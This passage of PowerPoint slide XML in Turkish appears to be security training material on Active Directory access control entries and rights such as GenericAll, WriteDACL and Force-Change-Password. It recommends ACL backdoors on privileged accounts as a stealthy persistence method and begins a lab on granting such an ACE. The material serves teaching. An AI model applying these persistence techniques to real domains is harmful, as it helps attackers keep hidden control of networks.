            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ACL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Yapıları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74FFE-2A03-4B72-2F67-CD1AD0EBA9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Active Directory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>ortamında</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>yetkilendirme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>politikaları</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>çok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>detaylı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şekilde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>tanımlanabilmektedir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Bu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>objelerin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>ntSecurityDescriptor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>attributunda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>bulunmaktadır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>ACE (Access Control Entry): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>Yetkilendirme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>tanımı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>için</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>kullanılan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>tekil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>girdilerdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>ACL (Access Control List): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>Yetkilendirme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>tanımlarının</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>birlikte</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>oluşturduğu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>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en-US" sz="1800" dirty="0" err="1"/>
              <a:t>objeye</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>erişimlerin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>nihai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>kurallarını</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>barındıran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>girdilerdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>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FFF51C-D9AC-BB7A-C3CD-AA88D4CC7A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1800" b="1" dirty="0"/>
              <a:t>Owner</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>Objenin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>sahibini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>belirtir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>obje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>sahibinin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>obje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>üzerinde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>herhangi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değişikliği</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>yapma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>yetkisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>bulunmaktadır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>GenericAll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>Obje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>ile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>ilgili</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>tüm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>değişiklikleri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>yapma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>yetkisidir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>GenericWrite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>Objenin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>tüm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>değerlerine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> (attribute) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>yazma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>yetkisidir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>WriteDACL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>Obje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>üzerindeki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>yetkileri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>düzenleme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>yetkisidir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Extended-Rights</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>Obje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>üzerinde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>çeşitli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>değerler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>üzerinde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>yazma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>yetkisidir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>. ○ Force-Change-Password, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>GetChanges</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>WriteProperty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12805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D88E5-AE53-A337-5FB7-C1914633B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Önemli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Not – ACE/ACL Backdoor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3EE30-DED2-B7DD-E585-F3913D757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b="1" dirty="0"/>
              <a:t>ACE/ACL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>yapıları</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>çok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>detaylı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>spesifik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>yetkilendirmeler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>yapılabilmektedir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>.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Bu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>nedenle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>bu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>mekanizma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>tespiti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>zor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arka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>kapı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> (backdoor) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>olarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>kalıcılık</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> (persistence) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>amacıyla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>kullanılabilmektedir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>.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Ele </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>geçirdiğiniz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hesabı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>yetkili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gruba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>eklemektense</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>yetkili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grup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>üyesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>üzerinde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> ACL backdoor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>oluşturmak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>daha</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>az</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>tespit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>edilen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yöntemdir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2297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A5266-1FCD-BD41-3F0C-145D1BFB6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Uygulama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> #2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F627A-E4C3-70F9-FEB9-7891F85D01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Domain Controller </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>sunucusu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>üzerinde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>oturum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>açınız</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Active Directory Users and Computers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>uygulamasını</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>açınız</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Active Directory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ortamındaki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>objeleri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>üzerindeki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> ACL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>değerlerini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>inceleyiniz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Bir </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>adet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>kullanıcı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>hesabı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>oluşturunuz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Oluşturduğunuz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>kullanıcı’dan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>daha</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>önceki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>kullanıcıya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> Force-Change-Password ACE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
